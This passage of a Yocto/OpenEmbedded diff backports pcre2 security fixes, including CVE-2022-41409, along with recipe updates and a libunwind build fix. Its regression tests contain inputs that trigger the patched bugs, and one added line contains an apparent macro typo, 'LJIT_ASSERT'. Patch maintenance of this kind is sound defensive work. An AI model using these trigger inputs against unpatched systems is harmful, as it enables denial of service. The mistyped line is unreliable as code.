++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 2 + IMM2_SIZE;
+ #ifdef SUPPORT_UNICODE
+@@ -2590,30 +2659,30 @@ while (cc < ccend)
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_1
+- if (PRIVATE_DATA(cc))
+- {
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ private_count = 1;
+- private_srcw[0] = PRIVATE_DATA(cc);
+- }
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2A
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 1;
+ break;
+
+ CASE_ITERATOR_TYPE_PRIVATE_DATA_2B
+- if (PRIVATE_DATA(cc))
++ private_srcw[0] = PRIVATE_DATA(cc);
++ if (private_srcw[0] != 0 && recurse_check_bit(common, private_srcw[0]))
+ {
+ private_count = 2;
+- private_srcw[0] = PRIVATE_DATA(cc);
+ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
+ }
+ cc += 1 + IMM2_SIZE;
+ break;
+@@ -2630,14 +2699,17 @@ while (cc < ccend)
+ switch(get_class_iterator_size(cc + i))
+ {
+ case 1:
+- private_count = 1;
+ private_srcw[0] = PRIVATE_DATA(cc);
+ break;
+
+ case 2:
+- private_count = 2;
+ private_srcw[0] = PRIVATE_DATA(cc);
+- private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ if (recurse_check_bit(common, private_srcw[0]))
++ {
++ private_count = 2;
++ private_srcw[1] = private_srcw[0] + sizeof(sljit_sw);
++ SLJIT_ASSERT(recurse_check_bit(common, private_srcw[1]));
++ }
+ break;
+
+ default:
+@@ -2652,28 +2724,25 @@ while (cc < ccend)
+ case OP_PRUNE_ARG:
+ case OP_THEN_ARG:
+ SLJIT_ASSERT(common->mark_ptr != 0);
+- if (has_quit && !setmark_found)
++ if (has_quit && recurse_check_bit(common, common->mark_ptr))
+ {
+ kept_shared_srcw[0] = common->mark_ptr;
+ kept_shared_count = 1;
+- setmark_found = TRUE;
+ }
+- if (common->control_head_ptr != 0 && !control_head_found)
++ if (common->control_head_ptr != 0 && recurse_check_bit(common, common->control_head_ptr))
+ {
+ shared_srcw[0] = common->control_head_ptr;
+ shared_count = 1;
+- control_head_found = TRUE;
+ }
+ cc += 1 + 2 + cc[1];
+ break;
+
+ case OP_THEN:
+ SLJIT_ASSERT(common->control_head_ptr != 0);
+- if (!control_head_found)
++ if (recurse_check_bit(common, common->control_head_ptr))
+ {
+ shared_srcw[0] = common->control_head_ptr;
+ shared_count = 1;
+- control_head_found = TRUE;
+ }
+ cc++;
+ break;
+@@ -2681,7 +2750,7 @@ while (cc < ccend)
+ default:
+ cc = next_opcode(common, cc);
+ SLJIT_ASSERT(cc != NULL);
+- break;
++ continue;
+ }
+
+ if (type != recurse_copy_shared_to_global && type != recurse_copy_kept_shared_to_global)
+@@ -13262,7 +13331,7 @@ SLJIT_ASSERT(!(common->req_char_ptr != 0 && common->start_used_ptr != 0));
+ common->cbra_ptr = OVECTOR_START + (re->top_bracket + 1) * 2 * sizeof(sljit_sw);
+
+ total_length = ccend - common->start;
+-common->private_data_ptrs = (sljit_s32 *)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
++common->private_data_ptrs = (sljit_s32*)SLJIT_MALLOC(total_length * (sizeof(sljit_s32) + (common->has_then ? 1 : 0)), allocator_data);
+ if (!common->private_data_ptrs)
+ {
+ SLJIT_FREE(common->optimized_cbracket, allocator_data);
+@@ -13304,6 +13373,7 @@ if (!compiler)
+ common->compiler = compiler;
+
+ /* Main pcre_jit_exec entry. */
++LJIT_ASSERT((private_data_size & (sizeof(sljit_sw) - 1)) == 0);
+ sljit_emit_enter(compiler, 0, SLJIT_ARG1(SW), 5, 5, 0, 0, private_data_size);
+
+ /* Register init. */
+@@ -13524,20 +13594,40 @@ common->fast_fail_end_ptr = 0;
+ common->currententry = common->entries;
+ common->local_quit_available = TRUE;
+ quit_label = common->quit_label;
+-while (common->currententry != NULL)
++if (common->currententry != NULL)
+ {
+- /* Might add new entries. */
+- compile_recurse(common);
+- if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
++ /* A free bit for each private data. */
++ common->recurse_bitset_size = ((private_data_size / (int)sizeof(sljit_sw)) + 7) >> 3;
++ SLJIT_ASSERT(common->recurse_bitset_size > 0);
++ common->recurse_bitset = (sljit_u8*)SLJIT_MALLOC(common->recurse_bitset_size, allocator_data);;
++
++ if (common->recurse_bitset != NULL)
++ {
++ do
++ {
++ /* Might add new entries. */
++ compile_recurse(common);
++ if (SLJIT_UNLIKELY(sljit_get_compiler_error(compiler)))
++ break;
++ flush_stubs(common);
++ common->currententry = common->currententry->next;
++ }
++ while (common->currententry != NULL);
++
++ SLJIT_FREE(common->recurse_bitset, allocator_data);
++ }
++
++ if (common->currententry != NULL)
+ {
++ /* The common->recurse_bitset has been freed. */
++ SLJIT_ASSERT(sljit_get_compiler_error(compiler) || common->recurse_bitset == NULL);
++
+ sljit_free_compiler(compiler);
+ SLJIT_FREE(common->optimized_cbracket, allocator_data);
+ SLJIT_FREE(common->private_data_ptrs, allocator_data);
+ PRIV(jit_free_rodata)(common->read_only_data_head, allocator_data);
+ return PCRE2_ERROR_NOMEMORY;
+ }
+- flush_stubs(common);
+- common->currententry = common->currententry->next;
+ }
+ common->local_quit_available = FALSE;
+ common->quit_label = quit_label;
+diff --git a/src/pcre2_jit_test.c b/src/pcre2_jit_test.c
+index 9df87fd..2f84834 100644
+--- a/src/pcre2_jit_test.c
++++ b/src/pcre2_jit_test.c
+@@ -746,6 +746,7 @@ static struct regression_test_case regression_test_cases[] = {
+ { MU, A, 0, 0, "((?(R)a|(?1)){1,3}?)M", "aaaM" },
+ { MU, A, 0, 0, "((.)(?:.|\\2(?1))){0}#(?1)#", "#aabbccdde# #aabbccddee#" },
+ { MU, A, 0, 0, "((.)(?:\\2|\\2{4}b)){0}#(?:(?1))+#", "#aaaab# #aaaaab#" },
++ { MU, A, 0, 0 | F_NOMATCH, "(?1)$((.|\\2xx){1,2})", "abc" },
+
+ /* 16 bit specific tests. */
+ { CM, A, 0, 0 | F_FORCECONV, "\xc3\xa1", "\xc3\x81\xc3\xa1" },
+--
+2.25.1
+
diff --git a/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
new file mode 100644
index 0000000000..882277ae73
--- /dev/null
+++ b/meta/recipes-support/libpcre/libpcre2/CVE-2022-41409.patch
@@ -0,0 +1,74 @@
+From 94e1c001761373b7d9450768aa15d04c25547a35 Mon Sep 17 00:00:00 2001
+From: Philip Hazel <Philip.Hazel@gmail.com>
+Date: Tue, 16 Aug 2022 17:00:45 +0100
+Subject: [PATCH] Diagnose negative repeat value in pcre2test subject line
+
+CVE: CVE-2022-41409
+Upstream-Status: Backport [https://github.com/PCRE2Project/pcre2/commit/94e1c001761373b7d9450768aa15d04c25547a35]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+
+---
+ ChangeLog | 3 +++
+ src/pcre2test.c | 4 ++--
+ testdata/testinput2 | 3 +++
+ testdata/testoutput2 | 4 ++++
+ 4 files changed, 12 insertions(+), 2 deletions(-)
+
+diff --git a/ChangeLog b/ChangeLog
+index eab50eb7..276eb57a 100644
+--- a/ChangeLog
++++ b/ChangeLog
+@@ -7,6 +7,9 @@ fully read in caseless matching.
+ 24. Fixed an issue affecting recursions in JIT caused by duplicated data
+ transfers.
+
++20. A negative repeat value in a pcre2test subject line was not being
++diagnosed, leading to infinite looping.
++
+
+ Version 10.34 21-November-2019
+ ------------------------------
+diff --git a/src/pcre2test.c b/src/pcre2test.c
+index 08f86096..f6f5d66c 100644
+--- a/src/pcre2test.c
++++ b/src/pcre2test.c
+@@ -6700,9 +6700,9 @@ while ((c = *p++) != 0)
+ }
+
+ i = (int32_t)li;
+- if (i-- == 0)
++ if (i-- <= 0)
+ {
+- fprintf(outfile, "** Zero repeat not allowed\n");
++ fprintf(outfile, "** Zero or negative repeat not allowed\n");
+ return PR_OK;
+ }
+
+diff --git a/testdata/testinput2 b/testdata/testinput2
+index 655e519..14e00ed 100644
+--- a/testdata/testinput2
++++ b/testdata/testinput2
+@@ -5772,4 +5772,7 @@ a)"xI
+ /(a)?a/I
+ manm
+
++--
++ \[X]{-10}
++
+ # End of testinput2
+diff --git a/testdata/testoutput2 b/testdata/testoutput2
+index c733c12..958f246 100644
+--- a/testdata/testoutput2
++++ b/testdata/testoutput2
+@@ -17435,6 +17435,10 @@ Subject length lower bound = 1
+ manm
+ 0: a
+
++--
++ \[X]{-10}
++** Zero or negative repeat not allowed
++
+ # End of testinput2
+ Error -70: PCRE2_ERROR_BADDATA (unknown error number)
+ Error -62: bad serialized data
diff --git a/meta/recipes-support/libpcre/libpcre2_10.34.bb b/meta/recipes-support/libpcre/libpcre2_10.34.bb
index fa8655e027..53277270d2 100644
--- a/meta/recipes-support/libpcre/libpcre2_10.34.bb
+++ b/meta/recipes-support/libpcre/libpcre2_10.34.bb
@@ -10,8 +10,12 @@ SECTION = "devel"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENCE;md5=b1588d3bb4cb0e1f5a597d908f8c5b37"
-SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre2-${PV}.tar.bz2 \
+SRC_URI = "http://downloads.yoctoproject.org/mirror/sources/pcre2-${PV}.tar.bz2 \
file://pcre-cross.patch \
+ file://CVE-2022-1586.patch \
+ file://CVE-2022-1586-regression.patch \
+ file://CVE-2022-1587.patch \
+ file://CVE-2022-41409.patch \
"
SRC_URI[md5sum] = "d280b62ded13f9ccf2fac16ee5286366"
diff --git a/meta/recipes-support/libpcre/libpcre_8.44.bb b/meta/recipes-support/libpcre/libpcre_8.44.bb
index e5471e81da..3267c5ad72 100644
--- a/meta/recipes-support/libpcre/libpcre_8.44.bb
+++ b/meta/recipes-support/libpcre/libpcre_8.44.bb
@@ -7,8 +7,7 @@ HOMEPAGE = "http://www.pcre.org"
SECTION = "devel"
LICENSE = "BSD-3-Clause"
LIC_FILES_CHKSUM = "file://LICENCE;md5=3bb381a66a5385b246d4877922e7511e"
-SRC_URI = "https://ftp.pcre.org/pub/pcre/pcre-${PV}.tar.bz2 \
- file://fix-pcre-name-collision.patch \
+SRC_URI = "${SOURCEFORGE_MIRROR}/pcre/pcre-${PV}.tar.bz2 \
file://run-ptest \
file://Makefile \
"
diff --git a/meta/recipes-support/libproxy/libproxy_0.4.15.bb b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
index 6f704d7a91..6c7d5a68a1 100644
--- a/meta/recipes-support/libproxy/libproxy_0.4.15.bb
+++ b/meta/recipes-support/libproxy/libproxy_0.4.15.bb
@@ -1,4 +1,8 @@
SUMMARY = "Library providing automatic proxy configuration management"
+DESCRIPTION = "libproxy provides interfaces to get the proxy that will be \
+used to access network resources. It uses various plugins to get proxy \
+configuration via different mechanisms (e.g. environment variables or \
+desktop settings)."
HOMEPAGE = "https://github.com/libproxy/libproxy"
BUGTRACKER = "https://github.com/libproxy/libproxy/issues"
SECTION = "libs"
diff --git a/meta/recipes-support/libpsl/libpsl_0.21.0.bb b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
index 9831b4b94f..66e64f785c 100644
--- a/meta/recipes-support/libpsl/libpsl_0.21.0.bb
+++ b/meta/recipes-support/libpsl/libpsl_0.21.0.bb
@@ -1,4 +1,10 @@
SUMMARY = "Public Suffix List library"
+DESCRIPTION = "The libpsl package provides a library for accessing and \
+resolving information from the Public Suffix List (PSL). The PSL is a set of \
+domain names beyond the standard suffixes, such as .com."
+
+HOMEPAGE = "https://rockdaboot.github.io/libpsl/"
+BUGTRACKER = "https://github.com/rockdaboot/libpsl/issues"
LICENSE = "MIT"
LIC_FILES_CHKSUM = "file://LICENSE;md5=5437030d9e4fbe7267ced058ddb8a7f5 \
@@ -13,11 +19,10 @@ SRC_URI[sha256sum] = "41bd1c75a375b85c337b59783f5deb93dbb443fb0a52d257f403df7bd6
UPSTREAM_CHECK_URI = "https://github.com/rockdaboot/libpsl/releases"
-DEPENDS = "libidn2"
-
inherit autotools gettext gtk-doc manpages pkgconfig lib_package
-PACKAGECONFIG ??= ""
+PACKAGECONFIG ?= "idn2"
PACKAGECONFIG[manpages] = "--enable-man,--disable-man,libxslt-native"
-
+PACKAGECONFIG[icu] = "--enable-runtime=libicu --enable-builtin=libicu,,icu"
+PACKAGECONFIG[idn2] = "--enable-runtime=libidn2 --enable-builtin=libidn2,,libidn2 libunistring"
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
index 6731b3373e..e42ac30bf2 100644
--- a/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
+++ b/meta/recipes-support/libsoup/libsoup-2.4_2.68.4.bb
@@ -1,11 +1,13 @@
SUMMARY = "An HTTP library implementation in C"
+DESCRIPTION = "libsoup is an HTTP client/server library for GNOME. It uses GObjects \
+and the glib main loop, to integrate well with GNOME applications."
HOMEPAGE = "https://wiki.gnome.org/Projects/libsoup"
BUGTRACKER = "https://bugzilla.gnome.org/"
SECTION = "x11/gnome/libs"
LICENSE = "LGPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=5f30f0716dfdd0d91eb439ebec522ec2"
-DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 intltool-native libpsl"
+DEPENDS = "glib-2.0 glib-2.0-native libxml2 sqlite3 libpsl"
SHRT_VER = "${@d.getVar('PV').split('.')[0]}.${@d.getVar('PV').split('.')[1]}"
@@ -40,4 +42,4 @@ DEBIAN_NOAUTONAME_${PN} = "1"
# glib-networking is needed for SSL, proxies, etc.
RRECOMMENDS_${PN} = "glib-networking"
-BBCLASSEXTEND = "native"
+BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/libunistring/libunistring_0.9.10.bb b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
index 97fac4ecfa..2197b6656d 100644
--- a/meta/recipes-support/libunistring/libunistring_0.9.10.bb
+++ b/meta/recipes-support/libunistring/libunistring_0.9.10.bb
@@ -18,6 +18,7 @@ LIC_FILES_CHKSUM = "file://COPYING.LIB;md5=6a6a8e020838b23406c81b19c1d46df6 \
file://README;beginline=45;endline=65;md5=08287d16ba8d839faed8d2dc14d7d6a5 \
file://doc/libunistring.texi;md5=287fa6075f78a3c85c1a52b0a92547cd \
"
+DEPENDS = "gperf-native"
SRC_URI = "${GNU_MIRROR}/libunistring/libunistring-${PV}.tar.gz \
file://iconv-m4-remove-the-test-to-convert-euc-jp.patch \
diff --git a/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
new file mode 100644
index 0000000000..34a1f46b0f
--- /dev/null
+++ b/meta/recipes-support/libunwind/libunwind/0001-Fix-compilation-with-fno-common.patch
@@ -0,0 +1,420 @@
+From 51112447b316813ad1ae50ea66feca4eb755a424 Mon Sep 17 00:00:00 2001
+From: Yichao Yu <yyc1992@gmail.com>
+Date: Tue, 31 Mar 2020 00:43:32 -0400
+Subject: [PATCH] Fix compilation with -fno-common.
+
+[Khem Raj]
+Making all other archs consistent with IA64 which should not have this problem.
+Also move the FIXME to the correct place.
+
+Also add some minimum comments about this...
+
+[Philippe Coval]
+
+Patch ported to v1.3-stable branch,
+patch to be used used in openembedded-core dunfell branch (on v1.3.1)
+for oniro project.
+
+Upstream-Status: Backport [https://github.com/libunwind/libunwind/pull/166]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+Thanks-to: Yichao Yu <yyc1992@gmail.com>
+Origin: https://github.com/libunwind/libunwind/commit/29e17d8d2ccbca07c423e3089a6d5ae8a1c9cb6e
+Relate-to: https://booting.oniroproject.org/distro/oniro/-/issues/191
+Forwarded: https://github.com/libunwind/libunwind/pull/312
+Last-Update: 2021-11-25
+Signed-off-by: Philippe Coval <philippe.coval@huawei.com>
+---
+ src/aarch64/Ginit.c | 15 +++++++--------
+ src/arm/Ginit.c | 15 +++++++--------
+ src/coredump/_UPT_get_dyn_info_list_addr.c | 5 +++++
+ src/hppa/Ginit.c | 15 +++++++--------
+ src/ia64/Ginit.c | 1 +
+ src/mi/Gfind_dynamic_proc_info.c | 1 +
+ src/mips/Ginit.c | 15 +++++++--------
+ src/ppc32/Ginit.c | 11 +++++++----
+ src/ppc64/Ginit.c | 11 +++++++----
+ src/ptrace/_UPT_get_dyn_info_list_addr.c | 5 +++++
+ src/sh/Ginit.c | 15 +++++++--------
+ src/tilegx/Ginit.c | 15 +++++++--------
+ src/x86/Ginit.c | 15 +++++++--------
+ src/x86_64/Ginit.c | 15 +++++++--------
+ 14 files changed, 82 insertions(+), 72 deletions(-)
+
+diff --git a/src/aarch64/Ginit.c b/src/aarch64/Ginit.c
+index 9c4eae82..cb954b15 100644
+--- a/src/aarch64/Ginit.c
++++ b/src/aarch64/Ginit.c
+@@ -61,13 +61,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -78,7 +71,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/arm/Ginit.c b/src/arm/Ginit.c
+index 2720d063..0bac0d72 100644
+--- a/src/arm/Ginit.c
++++ b/src/arm/Ginit.c
+@@ -57,18 +57,17 @@ tdep_uc_addr (unw_tdep_context_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/coredump/_UPT_get_dyn_info_list_addr.c b/src/coredump/_UPT_get_dyn_info_list_addr.c
+index 0d119055..739ed056 100644
+--- a/src/coredump/_UPT_get_dyn_info_list_addr.c
++++ b/src/coredump/_UPT_get_dyn_info_list_addr.c
+@@ -74,6 +74,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+
+ #else
+
++/* XXX fix me: there is currently no way to locate the dyn-info list
++ by a remote unwinder. On ia64, this is done via a special
++ unwind-table entry. Perhaps something similar can be done with
++ DWARF2 unwind info. */
++
+ static inline int
+ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+ int *countp)
+diff --git a/src/hppa/Ginit.c b/src/hppa/Ginit.c
+index 461e4b93..265455a6 100644
+--- a/src/hppa/Ginit.c
++++ b/src/hppa/Ginit.c
+@@ -64,13 +64,6 @@ _Uhppa_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -81,7 +74,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ia64/Ginit.c b/src/ia64/Ginit.c
+index b09a2ad5..8601bb3c 100644
+--- a/src/ia64/Ginit.c
++++ b/src/ia64/Ginit.c
+@@ -68,6 +68,7 @@ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ if (!_U_dyn_info_list_addr)
+ return -UNW_ENOINFO;
+ #endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
+ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+diff --git a/src/mi/Gfind_dynamic_proc_info.c b/src/mi/Gfind_dynamic_proc_info.c
+index 98d35012..2e7c62e5 100644
+--- a/src/mi/Gfind_dynamic_proc_info.c
++++ b/src/mi/Gfind_dynamic_proc_info.c
+@@ -49,6 +49,7 @@ local_find_proc_info (unw_addr_space_t as, unw_word_t ip, unw_proc_info_t *pi,
+ return -UNW_ENOINFO;
+ #endif
+
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
+ list = (unw_dyn_info_list_t *) (uintptr_t) _U_dyn_info_list_addr ();
+ for (di = list->first; di; di = di->next)
+ if (ip >= di->start_ip && ip < di->end_ip)
+diff --git a/src/mips/Ginit.c b/src/mips/Ginit.c
+index 3df170c7..bf7a8f5a 100644
+--- a/src/mips/Ginit.c
++++ b/src/mips/Ginit.c
+@@ -69,13 +69,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -86,7 +79,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ppc32/Ginit.c b/src/ppc32/Ginit.c
+index ba302448..7b454558 100644
+--- a/src/ppc32/Ginit.c
++++ b/src/ppc32/Ginit.c
+@@ -91,9 +91,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -104,7 +101,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ppc64/Ginit.c b/src/ppc64/Ginit.c
+index 4c88cd6e..7bfb395a 100644
+--- a/src/ppc64/Ginit.c
++++ b/src/ppc64/Ginit.c
+@@ -95,9 +95,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -108,7 +105,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/ptrace/_UPT_get_dyn_info_list_addr.c b/src/ptrace/_UPT_get_dyn_info_list_addr.c
+index cc5ed044..16671d45 100644
+--- a/src/ptrace/_UPT_get_dyn_info_list_addr.c
++++ b/src/ptrace/_UPT_get_dyn_info_list_addr.c
+@@ -71,6 +71,11 @@ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+
+ #else
+
++/* XXX fix me: there is currently no way to locate the dyn-info list
++ by a remote unwinder. On ia64, this is done via a special
++ unwind-table entry. Perhaps something similar can be done with
++ DWARF2 unwind info. */
++
+ static inline int
+ get_list_addr (unw_addr_space_t as, unw_word_t *dil_addr, void *arg,
+ int *countp)
+diff --git a/src/sh/Ginit.c b/src/sh/Ginit.c
+index 52988a72..9fe96d2b 100644
+--- a/src/sh/Ginit.c
++++ b/src/sh/Ginit.c
+@@ -58,13 +58,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -75,7 +68,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/tilegx/Ginit.c b/src/tilegx/Ginit.c
+index 7564a558..925e6413 100644
+--- a/src/tilegx/Ginit.c
++++ b/src/tilegx/Ginit.c
+@@ -64,13 +64,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
+ # endif /* UNW_LOCAL_ONLY */
+
+-HIDDEN unw_dyn_info_list_t _U_dyn_info_list;
+-
+-/* XXX fix me: there is currently no way to locate the dyn-info list
+- by a remote unwinder. On ia64, this is done via a special
+- unwind-table entry. Perhaps something similar can be done with
+- DWARF2 unwind info. */
+-
+ static void
+ put_unwind_info (unw_addr_space_t as, unw_proc_info_t *proc_info, void *arg)
+ {
+@@ -81,7 +74,13 @@ static int
+ get_dyn_info_list_addr (unw_addr_space_t as, unw_word_t *dyn_info_list_addr,
+ void *arg)
+ {
+- *dyn_info_list_addr = (unw_word_t) (intptr_t) &_U_dyn_info_list;
++#ifndef UNW_LOCAL_ONLY
++# pragma weak _U_dyn_info_list_addr
++ if (!_U_dyn_info_list_addr)
++ return -UNW_ENOINFO;
++#endif
++ // Access the `_U_dyn_info_list` from `LOCAL_ONLY` library, i.e. libunwind.so.
++ *dyn_info_list_addr = _U_dyn_info_list_addr ();
+ return 0;
+ }
+
+diff --git a/src/x86/Ginit.c b/src/x86/Ginit.c
+index f6b8dc27..3cec74a2 100644
+--- a/src/x86/Ginit.c
++++ b/src/x86/Ginit.c
+@@ -54,13 +54,6 @@ tdep_uc_addr (ucontext_t *uc, int reg)
+
